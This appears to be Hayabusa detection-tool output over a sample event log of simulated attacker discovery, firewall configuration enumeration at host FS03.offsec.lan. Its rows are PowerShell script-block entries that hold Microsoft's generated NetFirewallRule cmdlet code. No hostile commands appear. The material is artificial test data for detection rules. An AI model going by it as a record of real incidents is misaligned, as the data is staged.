[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"l')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 